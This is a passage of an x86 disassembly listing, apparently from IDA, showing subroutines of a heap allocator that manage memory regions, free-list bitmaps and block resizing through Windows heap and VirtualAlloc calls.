jnz short loc_41E2C0
mov ebx, edx
loc_41E249: ; CODE XREF: sub_41E1CB+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41E265
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41E263
add ebx, 14h
jmp short loc_41E249
; ---------------------------------------------------------------------------
loc_41E263: ; CODE XREF: sub_41E1CB+91�j
cmp ebx, eax
loc_41E265: ; CODE XREF: sub_41E1CB+83�j
jnz short loc_41E2C0
loc_41E267: ; CODE XREF: sub_41E1CB+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41E27D
cmp dword ptr [ebx+8], 0
jnz short loc_41E27A
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_41E267
; ---------------------------------------------------------------------------
loc_41E27A: ; CODE XREF: sub_41E1CB+A5�j
cmp ebx, [ebp+var_4]
loc_41E27D: ; CODE XREF: sub_41E1CB+9F�j
jnz short loc_41E2A5
mov ebx, edx
loc_41E281: ; CODE XREF: sub_41E1CB+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41E295
cmp dword ptr [ebx+8], 0
jnz short loc_41E293
add ebx, 14h
jmp short loc_41E281
; ---------------------------------------------------------------------------
loc_41E293: ; CODE XREF: sub_41E1CB+C1�j
cmp ebx, eax
loc_41E295: ; CODE XREF: sub_41E1CB+BB�j
jnz short loc_41E2A5
call sub_41E4D4
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41E2B9
loc_41E2A5: ; CODE XREF: sub_41E1CB:loc_41E27D�j
; sub_41E1CB:loc_41E295�j
push ebx
call sub_41E585
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41E2C0
loc_41E2B9: ; CODE XREF: sub_41E1CB+D8�j
xor eax, eax
jmp loc_41E4CF
; ---------------------------------------------------------------------------
loc_41E2C0: ; CODE XREF: sub_41E1CB+7A�j
; sub_41E1CB:loc_41E265�j ...
mov ds:dword_4DCFD0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41E2E7
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41E31E
loc_41E2E7: ; CODE XREF: sub_41E1CB+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41E31B
loc_41E304: ; CODE XREF: sub_41E1CB+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41E304
loc_41E31B: ; CODE XREF: sub_41E1CB+137�j
mov edx, [ebp+var_4]
loc_41E31E: ; CODE XREF: sub_41E1CB+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41E347
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41E347: ; CODE XREF: sub_41E1CB+16D�j
; sub_41E1CB+183�j
test ecx, ecx
jl short loc_41E350
shl ecx, 1
inc edi
jmp short loc_41E347
; ---------------------------------------------------------------------------
loc_41E350: ; CODE XREF: sub_41E1CB+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41E36D
push 3Fh
pop esi
loc_41E36D: ; CODE XREF: sub_41E1CB+19D�j
cmp esi, edi
jz loc_41E482
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41E3DE
cmp edi, 20h
jge short loc_41E3AD
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41E3DB
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_41E3DE
; ---------------------------------------------------------------------------
loc_41E3AD: ; CODE XREF: sub_41E1CB+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41E3DB
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41E3DE
; ---------------------------------------------------------------------------
loc_41E3DB: ; CODE XREF: sub_41E1CB+1D6�j
; sub_41E1CB+203�j
mov ebx, [ebp+arg_0]
loc_41E3DE: ; CODE XREF: sub_41E1CB+1B0�j
; sub_41E1CB+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41E48E
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41E47F
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_41E450
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41E43E
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41E43E: ; CODE XREF: sub_41E1CB+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41E47F
; ---------------------------------------------------------------------------
loc_41E450: ; CODE XREF: sub_41E1CB+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41E469
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41E469: ; CODE XREF: sub_41E1CB+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41E47F: ; CODE XREF: sub_41E1CB+24E�j
; sub_41E1CB+283�j
mov ecx, [ebp+var_8]
loc_41E482: ; CODE XREF: sub_41E1CB+1A4�j
test ecx, ecx
jz short loc_41E491
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41E491
; ---------------------------------------------------------------------------
loc_41E48E: ; CODE XREF: sub_41E1CB+229�j
mov ecx, [ebp+var_8]
loc_41E491: ; CODE XREF: sub_41E1CB+2B9�j
; sub_41E1CB+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41E4C7
cmp ebx, ds:dword_4DCFD4
jnz short loc_41E4C7
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4DCFCC
jnz short loc_41E4C7
and ds:dword_4DCFD4, 0
loc_41E4C7: ; CODE XREF: sub_41E1CB+2E0�j
; sub_41E1CB+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41E4CF: ; CODE XREF: sub_41E1CB+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E1CB endp
; =============== S U B R O U T I N E =======================================
sub_41E4D4 proc near ; CODE XREF: sub_41E1CB+CC�p
mov eax, ds:dword_4DCFD8
mov ecx, ds:dword_4DCFC8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41E517
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_4DCFDC
push edi
push ds:dword_4DCFE4
call dword_427198 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_41E567
add ds:dword_4DCFC8, 10h
mov ds:dword_4DCFDC, eax
mov eax, ds:dword_4DCFD8
loc_41E517: ; CODE XREF: sub_41E4D4+11�j
mov ecx, ds:dword_4DCFDC
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_4DCFE4
lea esi, [ecx+eax*4]
call dword_427144 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_41E567
push 4
push 2000h
push 100000h
push edi
call dword_4271C4 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41E56B
push dword ptr [esi+10h]
push edi
push ds:dword_4DCFE4
call dword_427140 ; RtlFreeHeap
loc_41E567: ; CODE XREF: sub_41E4D4+30�j
; sub_41E4D4+67�j
xor eax, eax
jmp short loc_41E582
; ---------------------------------------------------------------------------
loc_41E56B: ; CODE XREF: sub_41E4D4+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4DCFD8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41E582: ; CODE XREF: sub_41E4D4+95�j
pop edi
pop esi
retn
sub_41E4D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E585 proc near ; CODE XREF: sub_41E1CB+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_41E597: ; CODE XREF: sub_41E585+19�j
test eax, eax
jl short loc_41E5A0
shl eax, 1
inc ebx
jmp short loc_41E597
; ---------------------------------------------------------------------------
loc_41E5A0: ; CODE XREF: sub_41E585+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_41E5B5: ; CODE XREF: sub_41E585+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41E5B5
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_4271C4 ; VirtualAlloc
test eax, eax
jnz short loc_41E5E8
or eax, 0FFFFFFFFh
jmp loc_41E67B
; ---------------------------------------------------------------------------
loc_41E5E8: ; CODE XREF: sub_41E585+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_41E62E
lea eax, [edi+10h]
loc_41E5F5: ; CODE XREF: sub_41E585+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41E5F5
loc_41E62E: ; CODE XREF: sub_41E585+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41E66B
or [eax+4], edi
loc_41E66B: ; CODE XREF: sub_41E585+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41E67B: ; CODE XREF: sub_41E585+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E585 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E680 proc near ; CODE XREF: sub_41B202+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_41E82E
test bl, 1
jnz loc_41E827
add ebx, ecx
cmp esi, ebx
jg loc_41E827
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41E6F7
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41E6F7: ; CODE XREF: sub_41E680+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41E747
cmp ecx, 20h
jnb short loc_41E723
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41E747
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41E747
; ---------------------------------------------------------------------------
loc_41E723: ; CODE XREF: sub_41E680+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41E747
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41E747: ; CODE XREF: sub_41E680+7D�j
; sub_41E680+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41E815
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_41E781
push 3Fh
pop edi
loc_41E781: ; CODE XREF: sub_41E680+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41E803
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41E7DA
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41E7CD
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41E7CD: ; CODE XREF: sub_41E680+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_41E7FF
; ---------------------------------------------------------------------------
loc_41E7DA: ; CODE XREF: sub_41E680+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41E7F0
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41E7F0: ; CODE XREF: sub_41E680+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_41E7FF: ; CODE XREF: sub_41E680+158�j
shr edx, cl
or [eax], edx
loc_41E803: ; CODE XREF: sub_41E680+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41E818
; ---------------------------------------------------------------------------
loc_41E815: ; CODE XREF: sub_41E680+E5�j
mov edx, [ebp+arg_4]
loc_41E818: ; CODE XREF: sub_41E680+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41E96E
; ---------------------------------------------------------------------------
loc_41E827: ; CODE XREF: sub_41E680+52�j
; sub_41E680+5C�j
xor eax, eax
jmp loc_41E971
; ---------------------------------------------------------------------------
loc_41E82E: ; CODE XREF: sub_41E680+49�j
jge loc_41E96E
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41E859
push 3Fh
pop esi
loc_41E859: ; CODE XREF: sub_41E680+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41E8E8
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41E872
push 3Fh
pop esi
loc_41E872: ; CODE XREF: sub_41E680+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41E8C1
cmp esi, 20h
jnb short loc_41E89D
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41E8BE
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41E8BE
; ---------------------------------------------------------------------------
loc_41E89D: ; CODE XREF: sub_41E680+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41E8BE
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41E8BE: ; CODE XREF: sub_41E680+214�j
; sub_41E680+21B�j ...
mov ebx, [ebp+arg_4]
loc_41E8C1: ; CODE XREF: sub_41E680+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41E8E8
push 3Fh
pop esi
loc_41E8E8: ; CODE XREF: sub_41E680+1DD�j
; sub_41E680+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41E965
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41E93C
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E92F
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41E92F: ; CODE XREF: sub_41E680+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41E961
; ---------------------------------------------------------------------------
loc_41E93C: ; CODE XREF: sub_41E680+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E952
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41E952: ; CODE XREF: sub_41E680+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41E961: ; CODE XREF: sub_41E680+2BA�j
shr edx, cl
or [eax], edx
loc_41E965: ; CODE XREF: sub_41E680+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41E96E: ; CODE XREF: sub_41E680+1A2�j
; sub_41E680:loc_41E82E�j
push 1
pop eax
loc_41E971: ; CODE XREF: sub_41E680+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E680 endp
; =============== S U B R O U T I N E =======================================
sub_41E976 proc near ; CODE XREF: sub_41DDD2+41�p
; sub_41EC6E:loc_41EE3D�p
cmp dword_43A9C0, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_41E98A
mov esi, offset off_43A9B0
jmp short loc_41E9A7
; ---------------------------------------------------------------------------
loc_41E98A: ; CODE XREF: sub_41E976+B�j
push 2020h
push 0
push ds:dword_4DCFE4
call dword_427144 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_41EAB3
loc_41E9A7: ; CODE XREF: sub_41E976+12�j
mov ebp, dword_4271C4
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_41EA9C
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_41EA8E
mov eax, offset off_43A9B0
cmp esi, eax
jnz short loc_41EA06
cmp off_43A9B0, 0
jnz short loc_41E9F6
mov off_43A9B0, eax
loc_41E9F6: ; CODE XREF: sub_41E976+79�j
cmp off_43A9B4, 0
jnz short loc_41EA1B
mov off_43A9B4, eax
jmp short loc_41EA1B
; ---------------------------------------------------------------------------
loc_41EA06: ; CODE XREF: sub_41E976+70�j
mov [esi], eax
mov eax, off_43A9B4
mov [esi+4], eax
mov off_43A9B4, esi
mov eax, [esi+4]
mov [eax], esi
loc_41EA1B: ; CODE XREF: sub_41E976+87�j
; sub_41E976+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_41EA3D: ; CODE XREF: sub_41E976+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_41EA3D
push ebx
push 0
push edi
call sub_41B590
add esp, 0Ch
loc_41EA66: ; CODE XREF: sub_41E976+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_41EA8A
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_41EA66
; ---------------------------------------------------------------------------
loc_41EA8A: ; CODE XREF: sub_41E976+F7�j
mov eax, esi
jmp short loc_41EAB5
; ---------------------------------------------------------------------------
loc_41EA8E: ; CODE XREF: sub_41E976+63�j
push 8000h
push 0
push edi
call dword_4271C0 ; VirtualFree
loc_41EA9C: ; CODE XREF: sub_41E976+4B�j
cmp esi, offset off_43A9B0
jz short loc_41EAB3
push esi
push 0
push ds:dword_4DCFE4
call dword_427140 ; RtlFreeHeap
loc_41EAB3: ; CODE XREF: sub_41E976+2B�j
; sub_41E976+12C�j
xor eax, eax
loc_41EAB5: ; CODE XREF: sub_41E976+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41E976 endp
; =============== S U B R O U T I N E =======================================
sub_41EABA proc near ; CODE XREF: sub_41EB10+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call dword_4271C0 ; VirtualFree
cmp off_43C9D0, esi
jnz short loc_41EADF
mov eax, [esi+4]
mov off_43C9D0, eax
loc_41EADF: ; CODE XREF: sub_41EABA+1B�j
cmp esi, offset off_43A9B0
jz short loc_41EB07
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push ds:dword_4DCFE4
call dword_427140 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_41EB07: ; CODE XREF: sub_41EABA+2B�j
or dword_43A9C0, 0FFFFFFFFh
pop esi
retn
sub_41EABA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EB10 proc near ; CODE XREF: sub_41EC29+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_43A9B4
push edi
loc_41EB1D: ; CODE XREF: sub_41EB10+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_41EBBB
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41EB36: ; CODE XREF: sub_41EB10+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_41EB77
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call dword_4271C0 ; VirtualFree
test eax, eax
jz short loc_41EB77
or dword ptr [edi], 0FFFFFFFFh
dec ds:dword_4DB9D4
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41EB6C
cmp eax, edi
jbe short loc_41EB6F
loc_41EB6C: ; CODE XREF: sub_41EB10+56�j
mov [esi+0Ch], edi
loc_41EB6F: ; CODE XREF: sub_41EB10+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_41EB84
loc_41EB77: ; CODE XREF: sub_41EB10+2C�j
; sub_41EB10+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41EB36
loc_41EB84: ; CODE XREF: sub_41EB10+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_41EBBB
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_41EBBB
push 1
lea eax, [ecx+20h]
pop edx
loc_41EB9B: ; CODE XREF: sub_41EB10+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41EBAC
inc edx
add eax, 8
cmp edx, 400h
jl short loc_41EB9B
loc_41EBAC: ; CODE XREF: sub_41EB10+8E�j
cmp edx, 400h
jnz short loc_41EBBB
push ecx
call sub_41EABA
pop ecx
loc_41EBBB: ; CODE XREF: sub_41EB10+11�j
; sub_41EB10+7D�j ...
cmp esi, off_43A9B4
jz short loc_41EBCD
cmp [ebp+arg_0], 0
jg loc_41EB1D
loc_41EBCD: ; CODE XREF: sub_41EB10+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EB10 endp
; =============== S U B R O U T I N E =======================================
sub_41EBD2 proc near ; CODE XREF: sub_41B0B1+3A�p
; sub_41B202+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_43A9B0
push esi
mov ecx, edx
loc_41EBDE: ; CODE XREF: sub_41EBD2+1C�j
cmp eax, [ecx+10h]
jbe short loc_41EBE8
cmp eax, [ecx+14h]
jb short loc_41EBF0
loc_41EBE8: ; CODE XREF: sub_41EBD2+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_41EC25
jmp short loc_41EBDE
; ---------------------------------------------------------------------------
loc_41EBF0: ; CODE XREF: sub_41EBD2+14�j
test al, 0Fh
jnz short loc_41EC25
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_41EC25
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_41EC25: ; CODE XREF: sub_41EBD2+1A�j
; sub_41EBD2+20�j ...
xor eax, eax
pop esi
retn
sub_41EBD2 endp
; =============== S U B R O U T I N E =======================================
sub_41EC29 proc near ; CODE XREF: sub_41B0B1+4D�p
; sub_41B202+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_41EC6D
inc ds:dword_4DB9D4
cmp ds:dword_4DB9D4, 20h
jnz short locret_41EC6D
push 10h
call sub_41EB10
pop ecx
locret_41EC6D: ; CODE XREF: sub_41EC29+2B�j
; sub_41EC29+3A�j
retn
sub_41EC29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC6E proc near ; CODE XREF: sub_41B202+1AC�p
; sub_41B513+4A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_43C9D0
push edi
loc_41EC7C: ; CODE XREF: sub_41EC6E+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_41ED27
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_41ECE1
loc_41ECA7: ; CODE XREF: sub_41EC6E+6F�j
